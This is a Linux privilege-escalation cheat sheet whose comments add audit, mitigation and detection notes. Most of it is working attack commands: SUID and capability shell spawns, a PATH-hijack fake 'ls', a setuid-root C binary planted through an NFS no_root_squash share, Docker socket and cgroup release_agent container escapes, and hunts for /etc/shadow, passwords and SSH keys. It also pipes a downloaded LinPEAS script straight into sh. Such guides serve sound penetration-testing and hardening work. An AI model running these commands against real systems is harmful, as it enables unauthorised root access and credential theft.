
Linux Privilege Escalation

Comprehensive guide for escalating privileges on Linux systems
Table of Contents

System Enumeration

Basic System Information
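# OS version and kernel. The release/patch level is what a defender compares
# against the distribution's security advisories.
uname -a
cat /etc/os-release
cat /etc/issue
# lsb_release is not present on every distribution; skip it cleanly when absent
# instead of leaving a "command not found" in the output
if command -v lsb_release >/dev/null 2>&1; then
  lsb_release -a
fi

# Current user and groups. Membership in groups such as docker, disk, lxd or
# sudo is itself a privilege boundary and belongs in an access review.
id
whoami
groups

# All local accounts; /etc/passwd is world-readable by design
cat /etc/passwd
# /etc/shadow must be readable only by root. Test first rather than erroring
# out, and treat a readable shadow file as a misconfiguration to correct.
if [ -r /etc/shadow ]; then
  cat /etc/shadow
fi

# Sudo rules for the current user (may prompt for a password). NOPASSWD
# entries and wildcard command specs are the findings to tighten.
sudo -l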

Running Processes
# All processes, BSD (`aux`) and System V (`-ef`) formats. Both show full
# command lines, which is why credentials passed as arguments are visible to
# every local user; secrets belong in files or the environment, not argv.
ps aux
ps -ef

# Process tree (parent/child relationships with PIDs)
pstree -p

# Processes by user. Root-owned services are the ones whose inputs (config
# files, sockets, scheduled scripts) need the strictest ownership and modes.
ps -u root
# <username> is a placeholder: substitute an account name
ps -u <username>

SUID/SGID Files

Find SUID Binaries
# SUID (set-user-ID) executables run with their owner's privileges, so every
# entry here is part of the host's attack surface. Compare the list against
# the distribution's defaults and strip the bit from anything unexpected.
find / -type f -perm -u=s 2>/dev/null

# SGID (set-group-ID) executables: same reasoning for group privileges
find / -type f -perm -g=s 2>/dev/null

# Both bits in a single pass, with owner and mode printed for each hit
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

# SUID binaries the current user can modify. A writable SUID file is a
# critical misconfiguration; fix ownership/mode rather than just noting it.
find / -type f -perm -u=s -writable 2>/dev/null

Common SUID Exploits
# GTFOBins catalogues which common binaries can spawn a shell or read/write
# files when they carry the SUID bit. The audit action is to compare the SUID
# list from the previous section against it and remove the bit from anything
# that does not strictly need it.
# https://gtfobins.github.io/

# Example: find with SUID (sh -p keeps the elevated effective UID instead of
# dropping it at startup)
find . -exec /bin/sh -p \; -quit

# Example: vim with SUID (goes through vim's embedded Python interpreter, so a
# SUID editor is effectively a SUID interpreter)
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# Example: nmap (older versions) - interactive mode is not present in current
# releases; the second line is typed at the nmap prompt, not in the shell
nmap --interactive
!sh

Capabilities
# File capabilities grant slices of root's power to a binary without the SUID
# bit, so they need the same audit as SUID files; getcap -r lists every file
# carrying one
getcap -r / 2>/dev/null

# Common capability exploits. The ./ prefix in the examples means a local copy
# of the interpreter or tool that carries the named capability.
# CAP_SETUID lets the process switch its UID; an interpreter with it is
# equivalent to a SUID shell and should never carry it
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# CAP_DAC_READ_SEARCH (read any file) bypasses read permission checks, which
# is why an archiver holding it can copy /etc/shadow
./tar -cvf shadow.tar /etc/shadow
./tar -xvf shadow.tar

Cron Jobs
# System-wide cron: /etc/crontab plus the /etc/cron.* drop-in directories.
# Every script referenced here, and the directory holding it, should be
# root-owned and not group/world-writable.
cat /etc/crontab
ls -la /etc/cron.*

# User cron (listing another user's crontab needs privileges)
crontab -l
# <user> is a placeholder: substitute an account name
crontab -u <user> -l

# Check for writable cron scripts
ls -la /etc/cron.d/
ls -la /var/spool/cron/crontabs/

# Monitor for new processes (pspy). Reads /proc without root, so it also
# catches short-lived jobs that crontab listings alone do not reveal;
# -pf prints commands and file events, -i 1000 sets the scan interval (ms)
./pspy64 -pf -i 1000

Writable Files & Directories
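# Files writable by the current user (-writable tests this user's access,
# not the world-writable bit). /proc is pruned instead of filtered with
# `grep -v proc`, so real paths that merely contain "proc" are no longer
# hidden from the listing.
find / -path /proc -prune -o -writable -type f -print 2>/dev/null

# Writable directories. A writable directory on a root-owned path (one a
# service or scheduled job writes into) is the usual follow-on finding.
find / -writable -type d 2>/dev/null

# Files owned by current user (quoted so an unusual user name is passed as
# a single word)
find / -user "$(whoami)" 2>/dev/null

# Writable /etc files: configuration an unprivileged user can change is a
# misconfiguration to fix at the ownership/mode level
find /etc -writable -type f 2>/dev/null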

PATH Hijacking
# Check current PATH (a relative entry such as "." or an empty element is a
# finding in itself)
echo $PATH

# Find writable directories in PATH. If a directory on a privileged user's
# PATH is writable by others, any unqualified command name that user runs can
# be shadowed; the fix is root ownership and mode 755 on every PATH entry.
# NOTE(review): if this line is reused in a script, quote "$PATH" and use
# `read -r` so backslashes in directory names are not interpreted.
echo $PATH | tr ':' '\n' | while read dir; do [ -w "$dir" ] && echo "$dir is writable"; done

# Create malicious binary (illustrates why the writable-PATH finding matters)
cd /writable/path/in/PATH
echo '#!/bin/bash' > ls
echo '/bin/bash -p' >> ls
chmod +x ls

# Wait for privileged process to call 'ls'
# Detection: an executable named like a core utility appearing in a
# world-writable directory, and cron/sudo entries that use unqualified names.

Kernel Exploits
# Check kernel version: release string first, then the full build line
uname -r
uname -a

# Search for kernel exploits. Queries the local exploit-db copy for this
# release; the substitution is quoted so the release string is one argument.
searchsploit linux kernel "$(uname -r)"

# Common kernel exploits. Distributions backport fixes, so the running
# version number alone does not prove exposure; confirm against the distro
# changelog or advisory before drawing conclusions.
# DirtyCow (CVE-2016-5195) - kernel < 4.8.3
# Dirty Pipe (CVE-2022-0847) - kernel 5.8 - 5.16.11
# PwnKit (CVE-2021-4034) - polkit

Password Hunting
# Search for passwords in files. Any hit is a secrets-management finding:
# credentials belong in a vault or a root-only 0600 file, not in home
# directories, web roots or world-readable configuration.
grep -r "password" /home 2>/dev/null
grep -r "pass" /var/www 2>/dev/null
grep -r "pwd" /etc 2>/dev/null

# Search in history files. Shell and database clients record full command
# lines, including any password typed as an argument; HISTCONTROL=ignorespace
# or HISTIGNORE keeps such lines out of bash history.
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history

# Search in config files. Note grep is run per file without -H, so only the
# matching lines are printed, not the originating file name.
find / -name "*.conf" -exec grep -i "password" {} \; 2>/dev/null
find / -name "*.config" -exec grep -i "password" {} \; 2>/dev/null

# Database files (locate only sees what the last updatedb run indexed)
locate password | more
locate pass | more

SSH Keys
# Find SSH private keys. A private key should be mode 0600, owned by its user
# and passphrase-protected; one readable by another account is a
# lateral-movement finding, and id_dsa indicates a deprecated key type.
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

# Check SSH directory permissions (~/.ssh should be 0700; sshd's StrictModes
# refuses key authentication when the directory or files are group/world-
# writable)
ls -la ~/.ssh/

# Writable authorized_keys: anyone who can append to it gains persistent login
# as that user. Fix ownership/mode, or point AuthorizedKeysFile at a
# root-owned location.
find / -name authorized_keys -writable 2>/dev/null

Docker Escape
# Check if inside container. Neither signal is definitive (a missing
# /.dockerenv does not prove a bare host); the cat is redundant, grep can read
# the file directly.
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv

# Docker socket mounted into the container. Anyone who can talk to it can
# start containers with arbitrary host mounts, so it is equivalent to host
# root and must not be exposed to untrusted workloads.
ls -la /var/run/docker.sock

# Escape via docker socket (starts a new container with the host root
# filesystem bind-mounted at /mnt and chroots into it)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Privileged container escape. Relies on a writable cgroup v1 mount and the
# release_agent hook: when the last process leaves cgroup "x", the kernel runs
# the release_agent path on the host. The host-side path of the container's
# overlay upper layer is recovered from the "upperdir=" entry in /etc/mtab,
# and the /cmd script writes `ps aux` output back into that layer.
# Mitigations: no --privileged, no CAP_SYS_ADMIN in containers, cgroup v2 and
# user namespaces. Detection: cgroup mounts and writes to release_agent
# originating from a container.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
# backticks are the legacy form of $(...); \p in the sed pattern is a literal p
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# adds a short-lived process to the cgroup so that it empties and fires the hook
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

NFS Shares
# Check NFS exports. no_root_squash in /etc/exports means a client's root
# keeps uid 0 on the exported tree; root_squash is the default and should
# stay on for any share reachable by hosts the server does not control.
cat /etc/exports
# <target> is a placeholder: substitute the NFS server
showmount -e <target>

# Mount NFS share
mkdir /tmp/nfs
mount -t nfs <target>:/share /tmp/nfs

# no_root_squash exploit: a SUID-root binary created on the share by a root
# client is honoured when executed on the server. Exporting with root_squash,
# or mounting the share with nosuid on the server side, removes this.
# On attacker machine:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/pe.c
gcc /tmp/pe.c -o /tmp/nfs/pe
chmod +s /tmp/nfs/pe

# On target:
/tmp/nfs/pe

Automated Tools
# LinPEAS. NOTE(review): piping a remote script straight into sh runs whatever
# the server returns with no chance to review or verify it; prefer downloading
# to a file and checking it against the published release checksum/signature
# before executing. The download itself is also a useful network-detection
# signal for defenders.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum (assumes the script has been copied to the current directory)
./LinEnum.sh

# Linux Smart Enumeration (-l 1 raises the output level)
./lse.sh -l 1

# Linux Exploit Suggester. Maps kernel/distro version to known public issues;
# treat its output as a patch-status report, not as confirmed exposure.
./linux-exploit-suggester.sh

# pspy (monitor processes) - unprivileged view of process creation, useful
# for seeing cron and timer jobs as they run
./pspy64

Useful One-Liners
# Recently modified files (last 10 minutes): shows what a scheduled job or
# another user has just touched
find / -mmin -10 2>/dev/null

# Files by extension
find / -name "*.txt" 2>/dev/null

# Backup copies, which often keep the permissions of an older, looser config.
# The parentheses make the OR grouping explicit; find applies its implicit
# -print to the whole expression either way.
find / \( -name "*.bak" -o -name "*.old" -o -name "*.backup" \) 2>/dev/null

# /etc/shadow must never be readable by unprivileged users
[ -r /etc/shadow ] && printf '%s\n' "Shadow file is readable!"

# sudo version banner, to compare against the vendor advisory for CVE-2021-3156
sudo -V | head -n 1

[PROTOCOL] Always run automated enumeration tools first, then manually verify interesting findings.
[WARNING] Test exploits in an isolated lab environment before running them against any real system.